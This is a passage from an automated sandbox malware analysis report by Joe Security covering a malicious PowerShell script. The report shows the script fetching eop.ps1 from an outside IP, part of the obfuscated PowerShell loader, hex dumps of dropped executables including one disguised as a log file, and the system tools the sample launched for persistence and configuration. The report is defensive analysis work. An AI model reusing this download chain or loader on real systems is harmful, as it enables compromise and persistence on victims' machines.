30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 20 30 20 30 20 31 38 36 20 31 36 20 30 20 31 34 20 33 31 20 31 38 30 20 39 20 32 30 35 20 33 33 20 31 38 34 20 31 20 37 36 20 32 30 35 20 33 33 20 31 34 34 20 31 34 34 20 38 34 20 31 30 34 20 31 30 35 20 31 31 35 20 33 32 20 31 31 32 20 31 31 34 20 31 31 31 20 31 30 33 20 31 31 34 20 39 37 20 31 30 39 20 33 32 20 31 30 39 20 31 31 37 20 31 31 35 20 31 31 36 20 33 32 20 39 38 20 31 30 31 20 33 32 20 31 31 34 20 31 31 37 20 31 31 30 20 33 32 20 31 31 37 20 31 31 30 20 31 30 30 20 31 30 31 20 31 31 34 20 33 32 20 38 37 20 31 30 35 20 31 31 30 20 35 31 20 35 30 20 31 33 20 31 30 20 33 36 20 35 35 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 38 30 20 36 39 20 30 20 30 20 37 36 20 31 20 36 20 30 20 32 35 20 39 34 20 36 36 20 34 32 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 32 32 34 20 30 20 31 34 32 20 31 32 39 20 31 31 20 31 20 32 20 32 35 20 30 20 33 32 20 31 20 30 20 30 20 31 31 30 20 35 20 30 20 30 20 30 20 30 20 30 20 30 20 31 31 32 20 37 31 20 30 20 30 20 31 36 20 30 20 30 20 30 20 34 38 20 31 20 30 20 30 20 30 20 36 34 20 30 20 30 20 31 36 20 30 20 30 20 30 20 32 20 30 20 30 20 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 32 38 20 37 31 20 30 20 30 20 34 20 30 20 30 20 32 33 35 20 31 32 34 20 32 38 20 30 20 Data Ascii: 77 90 80 0 2 0 0 0 4 0 15 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 26 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 186 16 0 14 31 180 9 205 33 184 1 76 205 33 144 144 84 104 105 115 32 112 114 111 103 114 97 109 32 109 117 115 116 32 98 101 32 114 117 110 32 117 110 100 101 114 32 87 105 110 51 50 13 10 36 55 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 6 0 25 94 66 42 0 0 0 0 0 0 0 0 224 0 142 129 11 1 2 25 0 32 1 0 0 110 5 0 0 0 0 0 0 112 71 0 0 16 0 0 0 48 1 0 0 0 64 0 0 16 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 128 71 0 0 4 0 0 235 124 28 0

Session ID Source IP Source Port Destination IP Destination Port Process 6 192.168.2.2 49167 185.128.43.62 80 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

kBytes Timestamp transferred Direction Data Sep 4, 2018 7420 OUT GET /eop.ps1 HTTP/1.1 05:07:17.495357990 CEST Host: 185.128.43.62 Connection: Keep-Alive

Copyright Joe Security LLC 2018 Page 31 of 50 kBytes Timestamp transferred Direction Data Sep 4, 2018 7421 IN HTTP/1.1 200 OK 05:07:17.509254932 CEST Date: Tue, 04 Sep 2018 02:46:39 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Wed, 11 Jul 2018 08:12:19 GMT ETag: "a0138-3f1b-570b4ce2c7ec0" Accept-Ranges: bytes Content-Length: 16155 Content-type: application/octet-stream Content-Disposition: attachment Connection: close Data Raw: 26 28 20 24 70 73 48 4f 6d 65 5b 34 5d 2b 24 70 73 68 4f 6d 65 5b 33 34 5d 2b 27 78 27 29 28 20 22 20 24 28 20 73 65 74 20 20 27 4f 66 53 27 20 27 27 20 29 20 22 2b 5b 73 54 72 49 6e 47 5d 28 28 36 36 2c 20 37 35 2c 27 36 65 27 20 2c 36 33 2c 37 34 2c 36 39 2c 27 36 66 27 2c 20 27 36 65 27 20 2c 20 32 30 2c 20 35 34 2c 36 35 20 2c 37 33 20 2c 20 37 34 20 2c 27 32 64 27 2c 35 37 20 2c 20 27 36 66 27 20 2c 20 37 37 20 2c 20 33 36 20 2c 33 34 20 2c 32 38 20 2 c 20 32 39 20 2c 32 30 2c 27 37 62 27 2c 27 64 27 20 2c 20 27 61 27 20 2c 20 32 30 2c 32 30 2c 32 30 20 2c 32 30 20 2c 20 37 32 20 2c 36 35 2c 37 34 2c 37 35 20 2c 20 37 32 2c 20 27 36 65 27 2c 20 32 30 20 2c 32 38 20 2c 35 34 2c 36 35 20 2c 20 37 33 20 2c 20 37 34 20 2c 27 32 64 27 2c 35 37 2c 20 36 39 20 2c 20 27 36 65 27 2c 20 33 33 20 2c 20 33 32 20 2c 32 39 2c 32 30 2c 27 32 64 27 20 2c 20 36 31 20 2c 27 36 65 27 20 2c 20 36 34 20 2c 20 32 30 2c 20 32 38 2c 20 37 34 2c 20 36 35 2c 20 37 33 20 2c 20 37 34 20 2c 20 27 32 64 27 20 2c 37 30 20 2c 20 36 31 2c 20 37 34 2c 20 36 38 20 2c 32 30 20 2c 20 36 35 20 2c 20 27 36 65 27 20 2c 37 36 20 2c 20 27 33 61 27 2c 27 35 63 27 20 2c 20 35 30 20 2c 20 35 32 20 2c 27 34 66 27 2c 20 34 33 20 2c 20 34 35 2c 20 35 33 2c 35 33 2c 20 27 34 66 27 20 2c 35 32 2c 27 35 66 27 2c 20 34 31 20 2c 35 32 20 2c 34 33 2c 34 38 20 2c 34 39 20 2c 35 34 20 2c 34 35 2c 20 35 37 2c 33 36 20 2c 33 34 20 2c 33 33 2c 20 33 32 20 2c 20 32 39 2c 27 64 27 20 2c 27 61 27 20 2c 27 37 64 27 20 2c 20 27 64 27 2c 27 61 27 20 2c 36 36 20 2c 37 35 2c 27 36 65 27 20 2c 20 36 33 20 2c 37 34 20 2c 36 39 2c 20 27 36 66 27 2c 20 27 36 65 27 2c 32 30 2c 20 35 34 2c 36 35 20 2c 37 33 2c 37 34 2c 27 32 64 27 20 2c 35 37 20 2c 36 39 20 2c 20 27 36 65 27 2c 20 33 33 2 c 20 33 32 2c 32 38 20 2c 32 39 2c 32 30 2c 20 27 37 62 27 2c 27 64 27 20 2c 27 61 27 20 2c 32 30 2c 32 30 2c 32 30 20 2c 32 30 2c 20 37 32 20 2c 36 35 20 2c 37 34 2c 37 35 20 2c 37 32 20 2c 20 27 36 65 27 20 2c 20 32 30 20 2c 27 35 62 27 20 2c 20 34 39 2c 20 27 36 65 27 20 2c 20 37 34 2c 20 35 30 2c 20 37 34 20 2c 37 32 2c 20 27 35 64 27 2c 20 27 33 61 27 20 2c 27 33 61 27 2c 20 37 33 20 2c 36 39 2c 27 37 61 27 20 2c 36 35 20 2c 32 30 20 2c 27 32 64 27 2c 36 35 2c 20 37 31 20 2c 32 30 2c 20 33 34 20 2c 27 64 27 2c 27 61 27 2c 20 27 37 64 27 20 2c 27 64 27 20 2c 20 27 61 27 2c 20 36 39 20 2c 20 36 36 2c 20 32 30 2c 32 38 20 2c 35 34 20 2c 20 36 35 2c 20 37 33 20 2c 20 37 34 20 2c 20 27 32 64 27 2c 35 37 2c 20 27 36 66 27 20 2c Data Ascii: &( $psHOme[4]+$pshOme[34]+'x')( " $( set 'OfS' '' ) "+[sTrInG]((66, 75,'6e' ,63,74,69,'6f', '6e' , 20, 54,65 ,73 , 74 ,'2d',57 , '6f' , 77 , 36 ,34 ,28 , 29 ,20,'7b','d' , 'a' , 20,20,20 ,20 , 72 ,65,74,75 , 72, '6e', 20 ,28 ,54,65 , 73 , 74 ,'2d',57, 69 , '6e', 33 , 32 ,29,20,'2d' , 61 ,'6e' , 64 , 20, 28, 74, 65, 73 , 74 , '2d' ,70 , 61, 74, 68 ,20 , 65 , '6e' ,76 , '3a','5c' , 50 , 52 ,'4f', 43 , 45, 53,53, '4f' ,52,'5f', 41 ,52 ,43,48 ,49 ,54 ,45, 57,36 ,34 ,33, 32 , 29,'d' ,'a' ,'7d' , 'd','a' ,66 ,75,'6e' , 63 ,74 ,69, '6f', '6e',20, 54,65 ,73,74,'2d' ,57 ,69 , '6e', 33, 32,28 ,29,20, '7b','d' ,'a' ,20,20,20 ,20, 72 ,65 ,74,75 ,72 , '6e' , 20 ,'5b' , 49, '6e' , 74, 50, 74 ,72, '5d', '3a' ,'3a', 73 ,69,'7a' ,65 ,20 ,'2d',65, 71 ,20, 34 ,'d','a', '7d' ,'d' , 'a', 69 , 66, 20,28 ,54 , 65, 73 , 74 , '2d',57, '6f' ,

Session ID Source IP Source Port Destination IP Destination Port Process 7 192.168.2.2 49168 185.128.43.58 80 C:\Users\user\AppData\Local\Temp\cohernece.exe

kBytes Timestamp transferred Direction Data

Code Manipulations

Statistics

Behavior

• powershell.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • schtasks.exe • schtasks.exe • schtasks.exe • taskeng.exe • powercfg.exe • powercfg.exe • regsvr32.exe • powercfg.exe • regsvr32.exe • NETSTAT.EXE • csc.exe • NETSTAT.EXE • cmd.exe Copyright Joe Security LLC 2018 Page 32 of 50 • powershell.exe • cmd.exe • powershell.exe • reg.exe • reg.exe • reg.exe • cohernece.exe • findstr.exe • reg.exe • cohernece.exe • findstr.exe • powershell.exe • NETSTAT.EXE • reg.exe

Click to jump to process

System Behavior

Analysis Process: powershell.exe PID: 3268 Parent PID: 3064

General

Start time: 05:05:41 Start date: 04/09/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\antitrojan.ps1' Imagebase: 0x21e10000 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Has administrator privileges: true Programmed in: .Net C# or VB.NET Yara matches: Rule: PowerShell_Mal_HackTool_Gen, Description: Detects PowerShell hack tool samples - generic PE loader, Source: 00000001.00000003.1684190923.02432000.00000004.sdmp, Author: Florian Roth Reputation: high

File Activities

File Created

Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\06trmcfr.tmp read attributes | none synchronous io success or wait 1 17E072F CreateFileW synchronize | non alert | non generic write directory file | open no recall C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs read attributes | none synchronous io success or wait 1 17E072F CreateFileW synchronize | non alert | non generic write directory file | open no recall C:\Users\user\AppData\Local\Temp\06trmcfr.dll read attributes | none synchronous io success or wait 1 17E072F CreateFileW synchronize | non alert | non generic read | directory file | generic write open no recall C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline read attributes | none synchronous io success or wait 1 17E072F CreateFileW synchronize | non alert | non generic write directory file | open no recall C:\Users\user\AppData\Local\Temp\06trmcfr.out read attributes | none synchronous io success or wait 1 17E072F CreateFileW synchronize | non alert | non generic write directory file | open no recall C:\Users\user\AppData\Local\Temp\06trmcfr.err read attributes | none synchronous io success or wait 1 17E072F CreateFileW synchronize | non alert | non generic write directory file | open no recall Copyright Joe Security LLC 2018 Page 33 of 50 Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\java-log-9527.log read attributes | none synchronous io success or wait 1 17E072F CreateFileW synchronize | non alert | non generic write directory file | open no recall C:\Users\user\AppData\Local\Temp\cohernece.exe read attributes | none synchronous io success or wait 1 17E072F CreateFileW synchronize | non alert | non generic write directory file | open no recall

File Deleted

Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline success or wait 1 17E01D2 DeleteFileW C:\Users\user\AppData\Local\Temp\06trmcfr.tmp success or wait 1 17E01D2 DeleteFileW C:\Users\user\AppData\Local\Temp\06trmcfr.dll success or wait 1 17E01D2 DeleteFileW C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs success or wait 1 17E01D2 DeleteFileW

Source Old File Path New File Path Completion Count Address Symbol

File Written

Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs unknown 4096 ef bb bf 75 73 69 6e ...using System;..using success or wait 1 17E08E7 WriteFile 67 20 53 79 73 74 65 System 6d 3b 0d 0a 75 73 69 .Collections.Generic;..usin 6e 67 20 53 79 73 74 g S 65 6d 2e 43 6f 6c 6c ystem.Diagnostics;..using 65 63 74 69 6f 6e 73 System.IO;..using 2e 47 65 6e 65 72 69 System.Net;..using 63 3b 0d 0a 75 73 69 System.Net.Sockets;..usin 6e 67 20 53 79 73 74 g 65 6d 2e 44 69 61 67 System.Text;....namespac 6e 6f 73 74 69 63 73 e PingCastle.Scanners.. 3b 0d 0a 75 73 69 6e {...public class m17sc... 67 20 53 79 73 74 65 {....static public bool 6d 2e 49 4f 3b 0d 0a Scan(stri 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 4e 65 74 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 4e 65 74 2e 53 6f 63 6b 65 74 73 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 54 65 78 74 3b 0d 0a 0d 0a 6e 61 6d 65 73 70 61 63 65 20 50 69 6e 67 43 61 73 74 6c 65 2e 53 63 61 6e 6e 65 72 73 0d 0a 7b 0d 0a 09 70 75 62 6c 69 63 20 63 6c 61 73 73 20 6d 31 37 73 63 0d 0a 09 7b 0d 0a 09 09 73 74 61 74 69 63 20 70 75 62 6c 69 63 20 62 6f 6f 6c 20 53 63 61 6e 28 73 74 72 69

Copyright Joe Security LLC 2018 Page 34 of 50 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs unknown 1640 3d 20 6e 65 77 20 62 = new byte[] success or wait 1 17E08E7 WriteFile 79 74 65 5b 5d 20 7b {...... 0x00,0x00, 0d 0a 09 09 09 09 30 0x00,0x00,...... 0xff,0x53,0x 78 30 30 2c 30 78 30 4d 30 2c 30 78 30 30 2c ,0x42,...... 0x75,...... 0x00,.. 30 78 30 30 2c 0d 0a ....0x00,...... 0x00,0x00,..... 09 09 09 09 30 78 66 .0x18,...... 0x01,0x28,...... 0x 66 2c 30 78 35 33 2c 00,0x00,...... 0x00,0x00,0x0 30 78 34 64 2c 30 78 0,0 34 32 2c 0d 0a 09 09 x00,0x00,0x00,0x00,0x00,. 09 09 30 78 37 35 2c ..... 0d 0a 09 09 09 09 30 0x00,0x00,...... data[28],dat 78 30 30 2c 0d 0a 09 a[29],data[30],da 09 09 09 30 78 30 30 2c 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 0d 0a 09 09 09 09 30 78 31 38 2c 0d 0a 09 09 09 09 30 78 30 31 2c 30 78 32 38 2c 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 0d 0a 09 09 09 09 64 61 74 61 5b 32 38 5d 2c 64 61 74 61 5b 32 39 5d 2c 64 61 74 61 5b 33 30 5d 2c 64 61 C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline unknown 327 ef bb bf 2f 74 3a 6c 69 .../t:library /utf8output /R:" success or wait 1 17E08E7 WriteFile 62 72 61 72 79 20 2f System.dll" 75 74 66 38 6f 75 74 /R:"C:\Windows\ass 70 75 74 20 2f 52 3a embly\GAC_MSIL\System. 22 53 79 73 74 65 6d Manageme 2e 64 6c 6c 22 20 2f nt.Automation\1.0.0.0__31 52 3a 22 43 3a 5c 57 bf385 69 6e 64 6f 77 73 5c 6ad364e35\System.Manag 61 73 73 65 6d 62 6c ement.Automation.dll" 79 5c 47 41 43 5f 4d /out:"C:\Users\u 53 49 4c 5c 53 79 73 ser\AppData\Local\Temp\0 74 65 6d 2e 4d 61 6e 6trmcfr.dll" /D:DEBUG 61 67 65 6d 65 6e 74 /debug+ /optimize- 2e 41 75 74 6f 6d 61 74 69 6f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f 33 31 62 66 33 38 35 36 61 64 33 36 34 65 33 35 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 2e 64 6c 6c 22 20 2f 6f 75 74 3a 22 43 3a 5c 55 73 65 72 73 5c 48 65 72 62 20 42 6c 61 63 6b 62 75 72 6e 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 30 36 74 72 6d 63 66 72 2e 64 6c 6c 22 20 2f 44 3a 44 45 42 55 47 20 2f 64 65 62 75 67 2b 20 2f 6f 70 74 69 6d 69 7a 65 2d 20

Copyright Joe Security LLC 2018 Page 35 of 50 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\06trmcfr.out unknown 422 ef bb bf 43 3a 5c 55 73 ...C:\Users\user\Desktop> success or wait 1 17E08E7 WriteFile 65 72 73 5c 48 65 72 "C:\ 62 20 42 6c 61 63 6b Windows\Microsoft.NET\Fr 62 75 72 6e 5c 44 65 amewor 73 6b 74 6f 70 3e 20 k\v2.0.50727\csc.exe" 22 43 3a 5c 57 69 6e /t:library /utf8output 64 6f 77 73 5c 4d 69 /R:"System.dll" 63 72 6f 73 6f 66 74 2e /R:"C:\Windows\assembly\ 4e 45 54 5c 46 72 61 GAC_M 6d 65 77 6f 72 6b 5c SIL\System.Management. 76 32 2e 30 2e 35 30 Automati 37 32 37 5c 63 73 63 on\1.0.0.0__31bf3856ad36 2e 65 78 65 22 20 2f 4e35\S 74 3a 6c 69 62 72 61 ystem.Management.Autom 72 79 20 2f 75 74 66 ation.dll" /o 38 6f 75 74 70 75 74 20 2f 52 3a 22 53 79 73 74 65 6d 2e 64 6c 6c 22 20 2f 52 3a 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 61 73 73 65 6d 62 6c 79 5c 47 41 43 5f 4d 53 49 4c 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f 33 31 62 66 33 38 35 36 61 64 33 36 34 65 33 35 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 2e 64 6c 6c 22 20 2f 6f C:\Users\user\AppData\Local\Temp\java-log-9527.log unknown 22528 4d 5a 90 00 03 00 00 MZ...... @..... success or wait 1 17E08E7 WriteFile 00 04 00 00 00 ff ff 00 ...... 00 b8 00 00 00 00 00 ...... !..L.!This program 00 00 40 00 00 00 00 cannot be run in DOS 00 00 00 00 00 00 00 mode.... 00 00 00 00 00 00 00 $...... @...... 2..... 00 00 00 00 00 00 00 ..k...... k...... 00 00 00 00 00 00 00 ...... I...... Rich...... 00 00 00 d8 00 00 00 ...... PE..L...De.[...... 0e 1f ba 0e 00 b4 09 ...... V..... cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 40 fc 95 cf 04 9d fb 9c 04 9d fb 9c 04 9d fb 9c 32 bb f1 9c 05 9d fb 9c 6b 82 f1 9c 0f 9d fb 9c 87 81 f5 9c 00 9d fb 9c 6b 82 ff 9c 06 9d fb 9c c7 92 a6 9c 09 9d fb 9c 04 9d fa 9c 49 9d fb 9c ec 82 f0 9c 00 9d fb 9c 52 69 63 68 04 9d fb 9c 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 44 65 0d 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 00 00 00 00 56 00 00 00 00 00

Copyright Joe Security LLC 2018 Page 36 of 50 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\cohernece.exe unknown 1827440 4d 5a 50 00 02 00 00 MZP...... @..... success or wait 1 17E08E7 WriteFile 00 04 00 0f 00 ff ff 00 ...... 00 b8 00 00 00 00 00 ...... !..L.!..This program 00 00 40 00 1a 00 00 must be run under 00 00 00 00 00 00 00 Win32..$7 00 00 00 00 00 00 00 ...... 00 00 00 00 00 00 00 ...... 00 00 00 00 00 00 00 ...... 00 00 00 00 01 00 00 ...... ba 10 00 0e 1f b4 09 ...... cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

File Read

Source File Path Offset Length Completion Count Address Symbol C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4095 success or wait 1 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 6304 success or wait 3 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4106 success or wait 1 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch unknown 48 success or wait 1 6C9AAC6F ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch unknown 48 success or wait 1 6C9AAC6F ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4095 success or wait 1 6C9EF210 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 6304 success or wait 3 6C9EF210 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4106 success or wait 1 6C9EF210 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml unknown 4096 success or wait 4 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml unknown 781 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml unknown 4096 success or wait 42 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml unknown 4096 success or wait 7 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml unknown 542 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml unknown 4096 success or wait 6 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml unknown 78 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml unknown 4096 success or wait 7 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml unknown 310 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml unknown 4096 success or wait 18 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml unknown 50 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml unknown 4096 success or wait 7 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml unknown 4096 success or wait 63 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml unknown 201 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml unknown 4096 success or wait 22 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml unknown 409 end of file 1 17E08E7 ReadFile Copyright Joe Security LLC 2018 Page 37 of 50 Source File Path Offset Length Completion Count Address Symbol C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml unknown 4096 success or wait 5 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml unknown 844 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml unknown 4096 success or wait 5 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml unknown 360 end of file 1 17E08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml unknown 4096 end of file 1 17E08E7 ReadFile C:\Users\user\Desktop\antitrojan.ps1 unknown 4096 success or wait 503 17E08E7 ReadFile C:\Users\user\Desktop\antitrojan.ps1 unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 2 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 1 17E08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 end of file 1 17E08E7 ReadFile C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1. unknown 4096 success or wait 1 6CA69FDE unknown 0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1. unknown 512 success or wait 1 6CA69FDE unknown 0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1. unknown 512 success or wait 1 6CA69FDE unknown 0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1. unknown 512 success or wait 1 6CA69FDE unknown 0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1. unknown 512 success or wait 1 6CA69FDE unknown 0.0.0__31bf3856ad364e35\System.Management.Automation.dll 